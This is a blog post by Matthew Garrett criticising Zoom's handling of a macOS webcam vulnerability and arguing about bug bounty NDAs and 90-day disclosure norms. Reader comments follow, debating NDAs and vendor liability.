Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
[personal profile] mjg59
Zoom had a vulnerability that allowed users on MacOS to be connected to a video conference with their webcam active simply by visiting an appropriately crafted page. Zoom's response has largely been to argue that:

a) There's a setting you can toggle to disable the webcam being on by default, so this isn't a big deal,
b) When Safari added a security feature requiring that users explicitly agree to launch Zoom, this created a poor user experience and so they were justified in working around this (and so introducing the vulnerability), and,
c) The submitter asked whether Zoom would pay them for disclosing the bug, and when Zoom said they'd only do so if the submitter signed an NDA, they declined.

(a) and (b) are clearly ludicrous arguments, but (c) is the interesting one. Zoom go on to mention that they disagreed with the severity of the issue, and in the end decided not to change how their software worked. If the submitter had agreed to the terms of the NDA, then Zoom's decision that this was a low severity issue would have led to them being given a small amount of money and never being allowed to talk about the vulnerability. Since Zoom apparently have no intention of fixing it, we'd presumably never have heard about it. Users would have been less informed, and the world would have been a less secure place.

The point of bug bounties is to provide people with an additional incentive to disclose security issues to companies. But what incentive are they offering? Well, that depends on who you are. For many people, the amount of money offered by bug bounty programs is meaningful, and agreeing to sign an NDA is worth it. For others, the ability to publicly talk about the issue is worth more than whatever the bounty may award - being able to give a presentation on the vulnerability at a high profile conference may be enough to get you a significantly better paying job. Others may be unwilling to sign an NDA on principle, refusing to trust that the company will ever disclose the issue or fix the vulnerability. And finally there are people who can't sign such an NDA - they may have discovered the issue on work time, and employer policies may prohibit them doing so.

Zoom are correct that it's not unusual for bug bounty programs to require NDAs. But when they talk about this being an industry standard, they come awfully close to suggesting that the submitter did something unusual or unreasonable in rejecting their bounty terms. When someone lets you know about a vulnerability, they're giving you an opportunity to have the issue fixed before the public knows about it. They've done something they didn't need to do - they could have just publicly disclosed it immediately, causing significant damage to your reputation and potentially putting your customers at risk. They could potentially have sold the information to a third party. But they didn't - they came to you first. If you want to offer them money in order to encourage them (and others) to do the same in future, then that's great. If you want to tie strings to that money, that's a choice you can make - but there's no reason for them to agree to those strings, and if they choose not to then you don't get to complain about that afterwards. And if they make it clear at the time of submission that they intend to publicly disclose the issue after 90 days, then they're acting in accordance with widely accepted norms. If you're not able to fix an issue within 90 days, that's very much your problem.

If your bug bounty requires people sign an NDA, you should think about why. If it's so you can control disclosure and delay things beyond 90 days (and potentially never disclose at all), look at whether the amount of money you're offering for that is anywhere near commensurate with the value the submitter could otherwise gain from the information and compare that to the reputational damage you'll take from people deciding that it's not worth it and just disclosing unilaterally. And, seriously, never ask for an NDA before you're committing to a specific $ amount - it's never reasonable to ask that someone sign away their rights without knowing exactly what they're getting in return.

tl;dr - a bug bounty should only be one component of your vulnerability reporting process. You need to be prepared for people to decline any restrictions you wish to place on them, and you need to be prepared for them to disclose on the date they initially proposed. If they give you 90 days, that's entirely within industry norms. Remember that a bargain is being struck here - you offering money isn't being generous, it's you attempting to provide an incentive for people to help you improve your security. If you're asking people to give up more than you're offering in return, don't be surprised if they say no.

Date: 2019-07-10 06:26 am (UTC)
drplokta: (Default)
From: [personal profile] drplokta
If I ruled the world, NDAs relating to information that was in your possession before you signed the NDA would be illegal and unenforceable. That would prevent abusive uses like this, where they’re basically used for hush money, while still allowing them to be used to protect legitimate company information.
From: (Anonymous)
Software freedom (the freedom to run, inspect, share, and modify published software) can fix this quite well all on its own. If all of the software involved were free software, nobody would need to consider signing an NDA to get anything fixed. If one developer proposed an NDA, one could pick a more cooperative developer instead. Control over the user is a convenient means of getting this done. This competition is part of the reason software developers distribute proprietary software--they seek to impose a monopoly/avoid competition for the software.

Date: 2020-09-11 03:14 pm (UTC)
From: (Anonymous)
"NDAs relating to information that was in your possession before you signed the NDA would be illegal and unenforceable" - That would mean that trade secrets would not be trade able. Arguable, intellectual property rights would become close to meaningless.

Date: 2020-09-11 04:23 pm (UTC)
drplokta: (Default)
From: [personal profile] drplokta
No, it wouldn’t mean that. You would be required to sign the NDA before the trade secrets were disclosed to you, and they would still be protected.

90 Days

Date: 2019-07-10 09:08 pm (UTC)
From: (Anonymous)
90 days is way too much time. The issue should be public the moment you find it if you want to responsibly disclose it. It's irresponsible to put people in risk longer than they have to.
>but what if the developer doesn't have a fix ready
Who cares? Just tell people to stop using the product.
>but then companies will lose users
Then don't make vulnerable software. It should be illegal to release software with major vulnerabilities. Maybe if these companies were punished hard enough they would actually invest into making secure software. The fact that vulnerabilities happen on a constant basis makes computer engineering a joke of the engineering professions.

Re: 90 Days

Date: 2019-07-11 10:38 am (UTC)
lovingboth: (Default)
From: [personal profile] lovingboth
"It should be illegal to release software with major vulnerabilities"

Ha, ha, ha.

After a string of insurance companies went bust in the 19th Century, someone suggested - I think it was in Punch magazine - that the directors of the next one to fail be hanged on the grounds that it would encourage all directors to be more prudent.

Perhaps we could adopt that for this.

Re: 90 Days

Date: 2019-07-18 09:08 am (UTC)
reddragdiva: (Default)
From: [personal profile] reddragdiva
or, more generally, a bit more direct personal liability for dangerous corporate incompetence.

Re: 90 Days

Date: 2020-09-11 03:15 pm (UTC)
From: (Anonymous)
While we are at it, let us also hang any surgeon whose patient dies.

Date: 2019-07-12 06:13 pm (UTC)
mellowtigger: (Terry 2010)
From: [personal profile] mellowtigger
We use Zoom at work (and some use Macs), so our tech bigwigs have been scrambling this week because of this vulnerability.

Profile

Matthew Garrett

About Matthew

Power management, mobile and firmware developer on Linux. Security developer at Aurora. Ex-biologist. [personal profile] mjg59 on Twitter. Content here should not be interpreted as the opinion of my employer. Also on Mastodon.

Page Summary

Expand Cut Tags

No cut tags